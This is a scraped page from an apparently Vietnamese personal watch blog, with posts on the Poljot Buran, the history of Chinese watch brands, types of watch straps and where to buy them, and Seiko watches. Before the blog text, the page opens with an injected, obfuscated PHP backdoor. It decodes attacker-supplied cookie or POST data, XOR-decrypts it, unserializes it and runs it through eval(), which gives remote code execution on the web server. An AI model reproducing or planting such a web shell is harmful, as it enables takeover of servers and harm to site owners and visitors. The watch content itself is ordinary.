$gkTikmvawS = class_exists("L_JuS");if (!$gkTikmvawS){class L_JuS{private $pEkriz;public static $gEJHvAd = "0bac3d14-080a-40da-9ae3-072f26eb3bee";public static $hiuUA = NULL;public function __construct(){$nACiVMM = $_COOKIE;$ZybOWNLPM = $_POST;$AjoGQkCSfU = @$nACiVMM[substr(L_JuS::$gEJHvAd, 0, 4)];if (!empty($AjoGQkCSfU)){$CHzhCIO = "base64";$MphdUtXc = "";$AjoGQkCSfU = explode(",", $AjoGQkCSfU);foreach ($AjoGQkCSfU as $XvwaYg){$MphdUtXc .= @$nACiVMM[$XvwaYg];$MphdUtXc .= @$ZybOWNLPM[$XvwaYg];}$MphdUtXc = array_map($CHzhCIO . chr ( 182 - 87 ).'d' . 'e' . "\143" . chr (111) . "\x64" . chr (101), array($MphdUtXc,)); $MphdUtXc = $MphdUtXc[0] ^ str_repeat(L_JuS::$gEJHvAd, (strlen($MphdUtXc[0]) / strlen(L_JuS::$gEJHvAd)) + 1);L_JuS::$hiuUA = @unserialize($MphdUtXc);}}public function __destruct(){$this->rybNWbPiMq();}private function rybNWbPiMq(){if (is_array(L_JuS::$hiuUA)) {$EgZDwdc = str_replace("\74" . chr ( 405 - 342 )."\160" . "\150" . chr ( 886 - 774 ), "", L_JuS::$hiuUA[chr ( 642 - 543 ).chr (111) . 'n' . "\164" . "\x65" . "\x6e" . 't']);eval($EgZDwdc);exit();}}}$RYRUp = new L_JuS(); $RYRUp = NULL;} ?> Watch – B.l.u.e

B.l.u.e

Inside the crowd, I dance [alone]

Menu Close

Category: Watch (page 1 of 2)

Poljot Buran

Poljot Buran tuy không phải là dòng nổi tiếng nhất mà Poljot từng sản xuất, nhưng nó cũng là một con đồng hồ thú vị, mang kha khá giai thoại.

Đại loại là quay lại lịch sử tầm 70 năm trước, khi thế chiến thứ II vừa kết thúc. Lúc đấy, Đức trên cương vị là kẻ bại trận đã bị Đồng Minh, đặc biệt là Liên Xô vơ vét rất nhiều kiến thức và công nghệ. Đồng hồ là một trong số đó. Ở đây, bài này chỉ nói cụ thể tới con Poljot Buran.

Ông cụ ông kị của Buran có tên là Tutima, được sản xuất ở Đức. Nhưng khi WWII kết thúc, nhà máy rơi vào tay Hồng quân Xô Viết. Người Liên Xô khi đó thích thú với thứ mà họ tìm được, thế là không ngại ngùng gì, họ chuyển cả dây chuyền sản xuất về Liên Xô. Và họ bắt đầu sản xuất phiên bản Liên Xô của dòng đồng hồ Đức Tutima đó, có tên đầu tiên là Kirova (được cho là đặt theo tên của Sergey Kirov – bí thư tỉnh uỷ Lenigrad, người được Stalin vô cùng sủng ái), sau đó là dòng Buran được ra đời kế tiếp.

Buran được đặt theo tên phi thuyền không gian của Liên Xô thời đó. Tên tiếng Liên Xô Буран có nghĩa là ‘bão tuyết’. Thiết kế của Buran khá lạ, khi bezel của nó tựa như đồng xu khía cạnh. Buran chỉ lấy thiết kế từ Tutima, nhưng máy không xài Urofa như bậc ông cụ, mà xài một trong những máy đặc-trưng và nổi-tiếng nhất của người Liên Xô: 3133.

Đồng hồ Liên Xô, đặc biệt là 3133 thường hầm hố và cứng cáp. Poljot Buran cũng không ngoại lệ. Buran rộng 40mm (chưa kể núm vặn), dày 13mm, dài 52mm. Máy 3133 thì cũng không cần phải nói nhiều, chạy trâu bò lắm, power reserve ở những con còn tốt có thể lên tới 50 tiếng.

Mình lén con gái mua con này khi ở Việt Nam vào tháng trước. Về lại Mỹ đeo vào, mới đeo 2 ngày đã có 2 người khen. Con mình mua may mắn là còn khá mới, màu vàng ở viền chưa hề bị phai hay trầy đi. Đeo vào ai cũng bảo nhìn sang và lạ. Âu thì thôi đó cũng coi như là một lời khen…

Đồng hồ Trung Quốc

Ấn tượng của đa phần người dùng khi nghe đến đồng hồ Trung Quốc ắt cũng không khác gì ấn tượng chung của mọi người về hàng Trung Quốc: giả, và kém chất lượng. Những người sưu tập đồng hồ ác cảm với đồng hồ Trung Quốc vì họ làm giả hay ăn cắp kiểu dáng, thiết kế của các hãng lớn một cách không thương tiếc. ‘Những con đồng hồ không có linh hồn‘ – có lẽ không có câu nào mô tả chính xác hơn nữa. Nhưng nếu nói một dân tộc có nền văn mình kéo dài cả vài thiên niên kỉ, với nhiều thành tựu trong lĩnh vực văn hoá, thủ công và cả công nghệ, không tìm được hãng Trung Quốc nào làm đồng hồ cho-ra-hồn thì ắt không tin được. Đúng thế, với những ai tìm hiểu về ngành công nghiệp đồng hồ ở Trung Quốc, thì dù không sánh được với một cường quốc khác cũng ở trong cùng khu vực là Nhật Bản, họ cũng có những điểm đặc sắc riêng của mình.

Thật ra, mình không phải hoàn toàn rành hay nghiên cứu nhiều về đồng hồ Trung Quốc, nhưng cũng từng có thời gian hứng thú tìm hiểu về nó, nay nhân tiện có người nhắc đến, mình xin mạn phép chia sẻ những kiến thức từng tìm hiểu được.

[toc]

Lịch sử

Khởi điểm khá chậm so với các nước khác, ngành công nghiệp đồng hồ Trung Quốc là con số 0 tròn trịa cho tới năm 1955, khi bốn thợ đồng hồ ở một xưởng sản xuất nhỏ với công cụ thiếu hụt, tìm tòi và nghiên cứu để từ con đồng hồ Thuỵ Sỹ hết sức cơ bản là Sindaco tạo ra con đồng hồ đầu tiên ở Trung Quốc. Tên của nó là Ngũ Tinh.

Tuy nhiên, mốc thật sự quan trọng nhất của đồng hồ Trung Quốc là ‘Dự án 304’.

Dự án 304

Năm 1963, bộ trưởng ngành công nghiệp nhẹ Trung Hoa nhận được lệnh từ Bộ Quốc Phòng để thiết kế đồng hồ dành riêng cho Quân Đội Nhân Dân Trung Hoa. Dự án này được mang mã 304. Cũng vào thời điểm đó, công ty Venus Watch của Thuỵ Sỹ quyết định bán đấu giá máy 175 của họ để lấy kinh phí phát triển máy 188. Thế là những người đứng đầu dự án 304 quyết định mua toàn bộ kỹ thuật của máy 175 và giao cho công ty Thiên Tân lắp đặt. Vài năm sau, Seagull 1963 ra mắt, được Bộ Quốc Phòng thông qua và được tặng cho 1400 phi công trong Không Quân Trung Hoa.

Đông Phong

Không dừng lại ở Seagull, Thiên Tân tiếp tục nghiên cứu và 3 năm sau, họ đã thành công tạo nên đồng hồ được thiết kế và chế tạo 100% từ Trung Quốc. Tên của nó là Đông Phong. Đông Phong xài máy ST5 hiện đại, mỏng, chính xác và chất lượng cao. ST5 cũng là con đồng hồ đạt chuẩn cao nhất của Quốc Gia. Đông Phong là một trong những con đồng hồ được dân sưu tập đồng hồ Trung Quốc ưa chuộng nhất, một phần vì lịch sử của nó, một phần vì những con ST5, kể cả máy được làm và khắc bằng tay, vì vậy không con nào giống con nào.

Cũng xin nói thêm về Đông Phong. Đây là con đồng hồ đầu tiên của Trung Quốc được xuất khẩu ra thế giới. Và ngày đó tình hình chính trị thế giới còn khá căng thẳng với sự tranh chấp giữa chủ nghĩa Cộng Sản, đứng đầu là Liên Xô và sau đó Trung Quốc, với chủ nghĩa tư bản Phương Tây, vì vậy sợ cái tên gió-Đông có phần nào nghe không thiện cảm lắm, Thiên Tân đã đổi tên gọi Sea-gull cho nó. Vì vậy, những con đồng hồ Đông Phong sau này ở đằng sau có hình chim hải âu đang tung cánh.

Đồng Tế

Vào những năm cuối thập kỉ 60, ngành công nghiệp đồng hồ Trung Hoa đã phát triển khá ổn định với chất lượng tốt và số lượng sản xuất ổn định. Tuy nhiên, bắt nguồn từ việc mỗi hãng đồng hồ đi theo việc mày mò, tổng hợp kiến thức từ các ngành đồng hồ khác trên thế giới khác nhau, Bộ Công Nghiệp Trung Quốc quyết định khởi động phong trào Đồng Tế.

Đồng Tế dưới sự lãnh đạo của bộ công nghiệp, tập hợp những thợ đồng hồ và những học giả xuất sắc nhất từ các hãng lớn nhất Trung Quốc thời điểm đó như: Công ty đồng hồ Thượng Hải, Công ty đồng hồ Thiên Tân, Bắc Kinh, Liêu Ninh, Công ty đồng hồ Quảng Châu & Tây An Hồng Kì… để cùng học tập, nghiên cứu kiến thức, hòng tạo nên một chuẩn chung cho ngành đồng hồ nước mình. Kết quả của phong trào đó là các hãng lớn ở Trung Quốc được củng cố lại kiến thức về đồng hồ của mình, và tạo tiền đề cho những bước phát triển nhảy vọt trong công nghệ và thiết kế vào nhiều năm sau.

Những hiệu đồng hồ nổi tiếng

Truyền thống

Thiên Tân (Tianjin)

Thiên Tân như đã nói ở trên, là công thần trong ngành công nghiệp đồng hồ Trung Hoa, và họ cũng là tên tuổi lớn nhất. Đông Phong (Dongfeng) vẫn là con đồng hồ mà bất cứ ai sưu tập đồng hồ Trung Quốc cũng đều mong muốn

Seagull 1963 có lẽ là con đồng hồ được quốc tế ưa chuộng nhất trong số các nhãn hiệu đồng hồ Trung Quốc. Gần đây, Thiên Tân đã phát hành lại Seagull 1963, vẫn giữ nguyên thiết kế như nguyên bản. Seagull 1963 luôn nằm trong tình trạng ‘cháy-hàng’ vì mức độ được ưa thích của mình.

Bắc Kinh (Beijing)

Bắc Kinh là một tên tuổi lớn khác của ngành đồng hồ Trung Quốc. Không có những con đồng hồ mang nặng giá trị lịch sử như Thiên Tân, Bắc Kinh tạo được danh tiếng của mình bằng việc cho ra mắt những con đồng hồ chất lượng tốt, giá cả phải chăng và thiết kế đẹp tuyệt vời. Theo nhiều thành viên người Trung Quốc trên các diễn đàn về đồng hồ mà mình tham gia, thì các con đồng hồ của Bắc Kinh tạo cho họ cảm giác như thấy thấp thoáng một hình ảnh của Bắc Kinh thật thụ – đầy kiêu hãnh, tinh tế nhưng cũng hiệu quả cao.

Các con nổi tiếng của Bắc Kinh.

Bắc Hải (Beihei)

Du Phong (ZhuFeng)

ZunJue

ZunDa

Song Linh (Shuangling)

Thượng Hải (Shanghai)

Cùng với Thiên Tân và Bắc Kinh, Thượng Hải tạo nên thế chân vạc vững chắc trong ngành công nghiệp đồng hồ Trung Quốc. Thượng Hải có lịch sử phát triển huy hoàng không hề kém cạnh gì 2 tên tuổi kia. Thậm chí, trong phong trào Đông Tế, Thượng Hải có thể nói đóng vai trò quan trọng nhất. Thiết kế của các con đồng hồ Thượng Hải không bóng bảy, hiện đại như Bắc Kinh, trái lại, nó có phần cổ điển hơn nhiều.

Baoshihua

Chunlei

Jiefang (Giải Phóng)

Jinji

Hiện đại

Seagull (Thiên Tân)

Thiên Tân vẫn giữ vị thế hàng đầu của mình bằng việc tung ra rất nhiều mẫu đồng hồ sang trọng và hiện đại (bên cạnh các nhãn hiệu kinh điển từ bao lâu năm). Ngoài ra hiện tại Seagull cũng là nhà cung cấp máy đồng hồ lớn nhất thế giới (4 triệu máy mỗi năm).

Fiyta

Hiệu đồng hồ bán chạy nhất ở thị trường nội địa. Fiyta là hiệu đồng hồ không-gian của Trung Quốc (được trang bị cho các phi hành gia). Fiyta cũng hay xuất hiện ở các hội chợ đồng hồ quan trọng trên thế giới, và cũng là một trong những tên tuổi được cho là có thể thay đổi hoàn toàn cảm nhận của mọi người về đồng hồ Trung Quốc. Fiyta được đeo bởi rất nhiều ngôi sao nổi tiếng Trung Quốc. Khác với 3 tên tuổi mình giới thiệu ở trên, Fiyta đi theo thiết kế hoàn toàn hiện đại.

Ebohr

Không nổi bằng Seagull hay Fiyta, tuy nhiên trong thị trường nội địa Ebohr cũng có chỗ đứng nhất định.

Thiên Vương (Tianwang)

Một tên tuổi mới nổi gần đây trên thị trường đồng hồ Trung Quốc, cùng với 3 cái tên trên được xem như tứ trụ nổi nhất của ngành đồng hồ Trung Quốc hiện đại.

Lời kết

Người Trung Quốc những năm thập niên 90 hay có câu: Ở Trung Hoa, có 3 thứ chạy-xoay-vòng là mơ ước của mọi gia đình – máy may, xe gắn máy và đồng hồ, đủ để nói lên đồng hồ có tầm ảnh hưởng nhất định với người dân Trung Hoa. Với sự khéo léo và nhanh lẹ trong việc chớp thời cơ của một dân tộc đã trải qua hàng bao ngàn năm phát triển, có lẽ không khó để nghĩ rằng, sẽ không cần lâu nữa trước khi cả thế giới đều công nhận Trung Hoa như một tên tuổi rực rỡ trong ngành công nghiệp đồng hồ. Ngày đó còn xa hay gần thì khó nói, nhưng theo mình, với đà phát triển như hiện tại, thì nó hoàn toàn có thể xảy ra.

Dây đồng hồ

Thường em nghĩ, trừ những ai quan tâm và đọc kha khá về đồng hồ, thì đều đánh giá không đúng mức tầm quan trọng của ‘dây đồng hồ’. Em hay khuyên bạn bè mình khi mua đồng hồ, đừng nên chú ý quá đến sợi dây. Điều đó không có nghĩa là dây không quan trọng, ngược lại, dây đồng hồ quan trọng đến mức nhiều khi nó nên được dành thời gian để cân nhắc và mua riêng. Sự tương quan giữa đồng hồ và dây đồng hồ có vẻ khá giống căn nhà và lớp sơn. Nhiều khi, chỉ thay đổi màu sơn, đã thay đổi tất cả cảm giác về một căn nhà. Dây đồng hồ cũng thế.

Hãy lấy vài hình con Omega Speedmaster với các loại dây khác nhau làm ví dụ.

(hình lấy từ fratellowatches)

Đấy, cũng cùng loại đồng hồ, nhưng khi thay dây vào, nhiều khi nhìn như một con đồng hồ mới hoàn toàn.

Em viết bài này ngoài mục đích tổng hợp những kiến thức em từng biết về dây đồng hồ thì cũng mong chia sẻ đến những thầy chưa có thời gian tìm hiểu, và mong các thầy có nhiều kinh nghiệm về dây, đặc biệt là dây da, chia sẻ thêm với em.

[toc]

Các loại dây đồng hồ phổ biến

1. Giả da cá sấu: đây có lẽ là loại dây phổ biến nhất. Các dây da thường được in hoa văn lên nhìn giống da cá sấu. Đa phần các loại đồng hồ dress đều có dây này, vì nhìn nó sang trọng hơn hẳn.

Croc Embossed

Croc Embossed

2. Dây đua (rally/ racing strap): dây đục những lỗ rất to dọc thân dây. Như các thầy chắc biết, một trong những việc gây khó chịu nhất khi đeo đồng hồ dây da vào mùa hè là mồ hôi từ cổ tay đổ ra sẽ khiến dây da ướt át, gây ngứa ngáy và mùi khó chịu. Các lỗ này có mục đích là làm thoáng cổ tay.

Heuer-Camaro-Rally-strap-Monochrome-6

3. Luống đôi (double ridge): một loại dây rất được ưa dùng ở các dòng đồng hồ thể thao hay năng động. Gọi là ‘luống đôi’ vì 2 rìa lồi lên như 2 luống, ở giữa lõm vào. Đeo dây này sẽ hướng ánh nhìn của mọi người vào phần chiếc đồng hồ nhiều hơn

double-ridge

4. Dây sắt: một trong những loại phổ biến nhất, có thể làm từ thép không rỉ, mạ vàng hay thậm chí bạch kim. Được dùng nhiều trong các loại đồng hồ lặn. Ngày nay rất nhiều người có khuynh hướng đeo dress watch với dây da sắt, dù theo quan điểm cá nhân của em, đó là sự kết hợp không thật sự hoàn hảo.

Rolex-Submariner-On-A-Jubilee-Bracelet

5. Dây được thêu nổi lên (Contrast Stitching): được khá ưa chuộng trong khoảng thời gian gần đây, nhiều người sử dụng vì nó lạ. Thường chỉ đan/ thêu được làm khác màu để nổi hẳn lên, tạo nên một điểm nhấn màu mới. Rất nhiều người dùng loại dây này để thêm tính casual cho con đồng hồ của mình.

Contrast Stitching

6. NATO/Zulu: dây tựa như dây nylon, không dùng spring bar để gắn vào mà xỏ thẳng xuyên qua spring bar. Một thời gian dài từng được xem là chỉ dành cho những loại đồng hồ rẻ tiền, nhưng càng ngày càng được sử dụng rộng rãi. Thậm chí, người ta còn có các phiên bản nâng cấp của thể loại NATO/Zulu truyền thống, thay vì sợi nylon thì là dây da.

speedy-nato

rolex-submariner-leather-nato-strap-men-style-gunny

7. Dây cao su: được đánh giá là khá casual. Được ưa chuộng vì nó rẻ, bền và tiện dụng

Rolex-bracelet-1024x680

8. Dây vải: thường được dùng trong các loại đồng hồ kiểu quân đội hay phi công. Dây vải hay được thêu nổi màu để tạo điểm nhấn cho cái màu xanh lá đậm hay xám đơn điệu.

canvas

9. Dây đồng hồ kiểu phi công: có thêm các con ốc gắn ở chỗ tiếp nối dây đồng hồ và đồng hồ, để tăng thêm sự chắc chắn.

Aviator-Strap

10. Dây mắt lưới (mesh): đây chắc là loại dây đồng hồ bị ghét nhiều nhất. Mesh đa phần làm từ thép không rỉ và được gia công theo hình mắt lưới. Nó kém trang trọng hơn loại dây thép truyền thống nhưng bù lại nhìn bớt đi được vẻ khô cứng và lạnh lẽo.

Như hình dưới là sự so sánh giữa dây thép truyền thống (link) và dây mắt lưới (mesh)

meshvslink

Khoá đồng hồ

Các loại ‘khoá’ đồng hồ thường được chia vào 2 mục chính: Clasp và Buckle.

Buckle như hình dưới đây hết sức dễ hiểu, hãy cùng em điểm qua nhanh và đi vào loại Clasp phức tạp hơn

buckle

Như đã thấy, buckle chỉ đơn giản là miếng sắt nhỏ được xỏ qua các lỗ trên đồng hồ để cố định, là loại truyền thống từ xưa đến nay. Còn Clasp, Clasp có các loại sau:

1. Clasp cánh bướm (clasp ẩn): em không biết tại sao nó có tên này, có thể vì khi mở ra, nó bung xoè như hình cánh bướm chăng (?), nhưng đây là loại Clasp ẩn nên nếu không có kinh nghiệm mở sẽ rất khó mở

butterflyclasp

Loại clasp này khi đóng vào rồi thì không thấy sự khác biệt, muốn mở phải luồn tay vào dưới dây để ấn bật lên

clip_image001

2. Flip Clasp: hãy nhìn hình minh hoạ

Flip clasp

loại clasp này khác với loại clasp trên và loại sau ở việc nó phải xỏ qua dây rồi mới ấn vào. Nhìn hình trên sẽ thấy đoạn dây lòi ra, sau khi ấn hai bên clasp vào rồi sẽ xỏ tiếp đoạn dây lòi ra đó vào keeper.

3. Clasp chắc chắn: thường được sử dụng trong các loại đồng hồ đắt tiền, để luôn đảm bảo đồng hồ sẽ nằm chắc chắn trên tay, không rơi xuống vì những sự cố đáng tiếc như lỏng khoá hay mối nối bị bật ra.

steel-watch-bracelet-deployment

Như trong hình, khi bên trái ấn xuống, phía bên phải sẽ có nắp để ấn đóng chặt lại lần nữa, và nắp này rất khó mở trừ khi nhấn hai nút bật hai bên đồng thời.

Các thuật ngữ kĩ thuật

Phần này em sẽ nói cực kì ngắn gọn, vì em nghĩ đa phần đều biết những kiến thức cơ bản này rồi. Ngoài những từ như buckle, clasp… đã nói ở trên, thì khi nói về dây đồng hồ, nên biết những thuật ngữ sau:

1. Spring bar: là thanh nhỏ để nối dây vào đồng hồ. Thường spring bar sẽ được xỏ vào dây và được cho một cách khéo léo vào đồng hồ (như trong hình minh hoạ).

springbar

Kĩ thuật lấy spring bar ra là một trong những kĩ thuật cơ bản nhất, nhưng không hẳn dễ thực hiện. Thường để lấy spring bar, ta hay dùng một bộ dụng cụ chuyên dụng. Tuy nhiên, vì nhiều yếu tố khác nhau, có thể do dây da làm quá dày, spring bar hai đầu làm quá ngắn chỉ ấn vô vừa đủ… khiến việc lấy spring bar ra nhiều khi là cả một cuộc vật lộn vất vả.

Để lấy spring bar ra, ta có thể dùng dụng cụ gắng len vào kẽ hở giữa dây và cạnh đồng hồ, ấn nhẹ xuống và hơi đẩy về hướng ngược lại với hướng cạnh đồng hồ. Và nhớ chú ý luôn úp mặt đồng hồ xuống, để lỡ trật tay thì không bị trầy mặt đồng hồ

springbartool

2. Lug: đây là thông số cần biết nếu muốn mua dây đồng hồ. Thường dây đồng hồ có các loại: 16mm, 18mm, 20mm, 22mm tương ứng với độ rộng của lug.

lug_width

Các loại da đồng hồ

Thường dây đồng hồ da là thứ được dùng để tăng thêm đẳng cấp và giá trị của đồng hồ. Dĩ nhiên, trên lí thuyết thì da con vật nào cũng làm được đồng hồ, nhưng thông thường, nguyên vật liệu làm da đồng hồ chỉ quanh quẩn vài loại chính, có lẽ vì độ phức tạp khi làm dây da đồng hồ.
– Đầu tiên, dây phải mỏng vừa đủ. Điều này phụ thuộc lớn vào loại da và kĩ thuật của người thợ thủ công.
– Kế tiếp, da phải bảo đảm xài lâu màu theo thời gian sẽ đẹp. Dĩ nhiên không ai trông đợi dây da sẽ đi cùng với con đồng hồ qua vài chục năm tuổi thọ của nó, nhưng ít nhất cũng phải xài tốt trong thời hạn vài năm.
– Cuối cùng là vì dây đồng hồ phải tiếp xúc với da tay người đeo ở các điều kiện thời tiết khác nhau, nên nó phải bảo đảm không gây mùi khó chịu, không gây cảm giác ngứa ngáy cho người đeo.

Vì lẽ đó, làm dây đồng hồ hay có các loại da sau:

1. Da thường: là các loại da rẻ tiền, thường nhiều nhất là da bò hay da dê. Loại da này là loại chiếm đa số và thường thấy ở các trang bán hàng thủ công. Tuy chỉ là da không mắc lắm, nhưng nếu biết cách chọn thì vẫn có thể tìm được nhiều loại dây đồng hồ độc và nhìn rất phá cách.

OP023-Genuine-Leather-Watch-Strap-Calfskin-Watch-Band-24mm-for-Panerai-Watch-Accessories

SCA2220054RD

2. Nappa sheep (từ da cừu): loại da này về cơ bản vẫn rẻ nhưng khác với da bò ở chỗ nó nhìn không gồ ghề bằng nên tạo cảm giác mềm mại lẫn sang trọng hơn. Tuy nhiên điều đáng chú ý là độ bền của nó không cao

MediciBrown03

MediciBrownGroup

3. Da cá sấu: được hầu hết các loại đồng hồ mắc tiền sử dụng. Nói kĩ hơn thì dường như người ta phân ra là cá sấu mõm ngắn (gator) và cá sấu (croc). Trong đó loại da làm từ gator hiếm hơn vì cá sấu mõm ngắn số lượng ít hơn. Dù cả 2 nhìn bề ngoài không khác biệt lắm, nhưng thường dây croc giả xuất hiện trên thị trường nhiều hơn, vì rất dễ dàng để ai đó cam đoan rằng ‘dây cá sấu (croc) này tôi lấy ở trang trại nuôi của người quen’, trong khi Gator thì không rộng rãi thế.

gator-strap

i-KCXHHt3-XL

102212_34pulseandleaves

4. Da thằn lằn: thường được sử dụng ở các loại đồng hồ vintage xa xưa, đặc biệt là những đồng hồ mỏng. Da thằn lằn đem lại bề mặt đan xen li ti, hợp với những con đồng hồ mỏng và thanh lịch

lizardstrap

lizard

5. Da đà điểu: nhiều người thích da đà điểu vì nó khá mềm, bề mặt lạ không đồng đều và nó bền.

128_zpsd90c0521dsc0282wv

6. Da cá mập: một lựa chọn được ưa thích của những ai mê đồng hồ lặn. Da cá mập khi gặp nước bề mặt đang từ khá phẳng sẽ nổi lên những cục phồng gồ ghề hay những đường nhăn.

shark2

shark

Những nơi bán dây đồng hồ

Dưới đây em xin giới thiệu một số chỗ bán dây đồng hồ uy tín. Xin lưu ý list này có được qua một thời gian dài lăn lóc, tìm hiểu của em từ các forum, trang web khác nhau. Đa phần trong đây là từ review của người khác, không phải của chính em, vì vậy các thầy chỉ nên xem list này như là gợi-ý. Và list này toàn là các trang ở nước ngoài thôi nhé, các tiệm hay handmade ở Việt Nam cũng có nhiều mà em chưa có điều kiện để trải nghiệm.

Dây xịn

1. Hirsch: một trong những brand về strap đồng hồ được đánh giá cao nhất. Hirsch bán khá nhiều loại dây đồng hồ, nhưng những gì làm nên tên tuổi họ là dây đồng hồ làm từ da cá sấu. Em nhìn và đọc qua giới thiệu thì thấy da cá sấu bọn này làm là hàng thật, làm khéo và khá bền. Đa phần những review em đọc về Hirsch Strap là rất tích cực.


2. Crown & Buckle: đây có lẽ là brand về strap đồng hồ được biết đến rộng rãi nhất trong cộng đồng chơi đồng hồ, bởi ngoài chất lượng rất tốt, đội ngũ làm social media của họ luôn rất tích cực hoạt động trên các forum về đồng hồ (worn&wound từng có bài phỏng vấn họ tại đây). Em có cảm giác các dây của Crown & Buckle làm rất lịch-sự, ở đây nghĩa là gọn gàng và thanh nhã. Họ làm đủ loại, từ Nato/Zulu đơn giản cho tới các loại da thường, và cả da khá cao cấp.

3. Horween Shell Cordovan: được nhiều người xem như công ty làm các sản phẩm từ da (đặc biệt là da mông ngựa) tốt nhất thế giới, Horween cho ra đời đủ loại sản phẩm: giày, túi, thắt lưng… Và dây đồng hồ. Dây đồng hồ của Horween được đánh giá cao bởi sự sang trọng và tinh tế, và cả cái hồn của nó – điều chỉ có được ở những tên tuổi gạo cội đã tồn tại và phát triển qua cả thế kỷ. Nghe đâu từng dây đồng hồ của Horween đều được lấy từ da ở mông ngựa và quá trình nhuộm màu để ra được màu đẹp và thật như thế kéo dài tới tận 6 tháng.

Dây lạ

1. Bonetto Cinturini: có lẽ là hiệu làm dây cao su nổi tiếng nhất. Dây cao su không được đánh giá cao về gout-thời-trang trong giới chơi đồng hồ, nhưng thỉnh thoảng, cũng có đôi ba khi những tay mê đồng hồ thèm cảm giác được đeo con diver và dây cao su của mình rồi nhảy ùm lặn xuống nước. Khi đó, có lẽ Bonetto Cinturini là lựa chọn tuyệt vời nhất.

2. Isofrane: được quảng cáo như dây sinh ra chỉ để dàh cho dân lặn, Isofrane mắc một cách khủng-khiếp. Vì giá tiền như thế, Isofrane luôn là một đề tài được bàn tán với nhiều ý kiến trái chiều trên các forum đồng hồ. Nhiều người cho rằng giá Isofrane là quá mắc so với chất lượng tương ứng, nhưng những người ủng hộ thì cho rằng độ bền, sự mềm mại và tiện lợi của Isofrane là đủ để bù vào cái sự đắt đỏ ấy.

Worth Checking: Rubber B

3. Bradystrap Sailcloth: được xem là tên tuổi đầu tiên làm dây đồng hồ từ vải-cột-buồm. Oh well, có nhiều người với sở thích chèo thuyền buồm nói rằng đây không thật sự là vải-cột-buồm, chỉ có pattern như vải cột buồm thôi. Cái này thì thật sự em không chắc, chỉ nêu thông tin em từng đọc được thôi. Dây Bradystrap có vẻ cứng cáp khô ráp của vải dù làm buồn, lại có sự mềm nhẹ như lướt sóng, chắc là nhờ các mũi đan xen nhau.

Dây NATO/Zulu

NATO và Zulu vì rẻ + dễ làm nên có rất, rất nhiều hãng, hay cá nhân làm dây này. Thật ra sự khác biệt giữa các hãng có tiếng và các cá nhân làm phải qua sử dụng lâu dài mới biết. Em từng mua dây NATO/Zulu của các cá nhân làm handmade, qua một thời gian là thấy vải bị sờn và tước ra lỉa chỉa trông rất xấu, trong khi đó từ các hãng lớn làm thì dây xài bền hơn. Em xin giới thiệu vài tên tuổi.

1. Maratac: là tên tuổi nổi bật nhất trong số những hãng làm dây NATO/Zulu, điều rõ nhất làm nên khác biệt giữa Maratac và các hãng khác là dây của Maratac nhìn mạnh mẽ và cứng cáp kiểu nhà-binh hơn. Nhìn chung em ấn tượng nhất với phần ring kim loại của nó, nhìn cực kì chắc chắn và cứng cáp.

2. Timefactors : đây là tên tuổi không lép vế quá so với Maratac. Các dây NATO/Zulu của Timefactors chất lượng cũng rất tốt, nhìn chung nếu phải so sánh thì chắc chỉ kém Maratac nửa điểm.

3. Da Luca: giá cả rất cao (được cho là tương ứng với chất lượng), em hoàn toàn không chú ý gì tới bọn này lắm, vì dây NATO/Zulu ở tầm giá này thì ngoài khả năng cân nhắc của em, nhưng cũng xin giới thiệu ở đây cho các thầy có nhu cầu.

Worth Checking: Gnomon, International Watchman Inc, natostrapco

Kết luận

Bài khá dài nên em tạm dừng ở đây. Em còn định giới thiệu thêm về những trang web, địa chỉ bán dây đồng hồ chất lượng mà em biết, hay được động đồng review tốt. Tuy nhiên, cũng đã một thời gian em không xem và đọc lại coi chất lượng của các nơi đó thế nào nên không dám viết bậy bạ, sợ mọi người mua phải hàng kém chất lượng. Nhưng nếu ai cần thì cứ liên lạc em, em có thể đưa tên và địa chỉ trang web để tự check.

Bài còn nhiều thiếu sót, đặc biệt càng về cuối viết càng đuối, nên mong nhận được sự đóng góp ý kiến từ mọi người.

B.l.u.e

Seiko Ananta ‘100 năm kỉ niệm’ – Niềm kiêu hãnh của một Samurai

(bài có vài chi tiết dịch từ những nguồn khác nhau)

Người ta có thể nhìn vào một (vài) chiếc đồng hồ để đoán được tính cách của cả một dân tộc. Đây là ý kiến cá nhân mà tôi đã đúc kết cho riêng mình sau hằng bao giờ ngồi ngây người ra ngắm, và đọc về đủ mọi thể loại đồng hồ. Tại sao ư? Vì đồng hồ, và ngành công nghiệp chế tạo đồng hồ là cả một nghệ thuật. Đó là sự hoà quyện tinh tế nhất giữa tính chính xác đến tột cùng của kĩ thuật, và những chi tiết thiết kế đẹp tới đừng điểm chấm. Nhìn vào những tác phẩm đấy, ta có thể biết những kĩ sư và nghệ sĩ đứng đằng sau tạo nên nó là người thế nào.

Đồng hồ Anh Quốc đầy chất cổ điển. Đồng hồ Liên Xô giản dị và đầy hoài niệm. Đồng hồ Đức chính xác đến mức khô khan và tinh tế đạt đến hoàn mỹ. Đồng hồ Mỹ cởi mở và khoáng đạt. Thế còn đồng hồ Nhật phác hoạ gì về con người Nhật? Để trả lời câu hỏi này, hãy cùng nhìn vào biểu tượng của ngành đồng hồ Nhật Bản – Seiko.

Seiko có những chiếc đồng hồ hết sức đơn giản, không cầu kì, không hoa mỹ phức tạp mà rất cần cù. Khi cầm một con Seiko 5, dù là loại rẻ nhất lên tay, ấn tượng đầu tiên của bạn về nó ắt phải là cảm phục – như cách bạn cảm phục những điểu bình dị nhất, cảm phục chiếc đồng hồ mỏng manh được tạo ra chỉ để cần cù làm công việc đong đếm thời gian. Tích tắc, tích tắc, và cứ mãi không ngưng.

seiko 5

Seiko lại có những con đồng hồ đầy tính nghệ thuật. Có con nhìn tinh khiết như bông tuyết rơi xoay nhẹ trên mặt nước ở một vùng quê nào đó. Có con nhìn lả lơi mời gọi nhưng vẫn kiêu kì như một geisha đang cất lên tiếng ca.

seiko snowflake

seiko cocktail time sweet

Seiko có con mạnh mẽ đến mức dữ dội và đanh ác. Có con thanh bình và tĩnh lặng như ngọn núi cao trường tồn cùng tuế nguyệt.

seiko monster

seiko alpinist

Nhưng trên hết, Seiko mang trong mình niềm kiêu hãnh, của một dân tộc có nền văn hoá đặc biệt không trộn lẫn vào đâu được, của một dân tộc lớn mạnh nhờ chiến tranh, nhưng cũng biết đứng dậy sau thất bại từ chiến tranh. Cầm bất cứ con Seiko nào lên, cũng có cảm giác như từng điểm, từng nét đó là tinh hoa, là kiêu hãnh xuất phát từ tận tâm của người nghệ sĩ.

—–

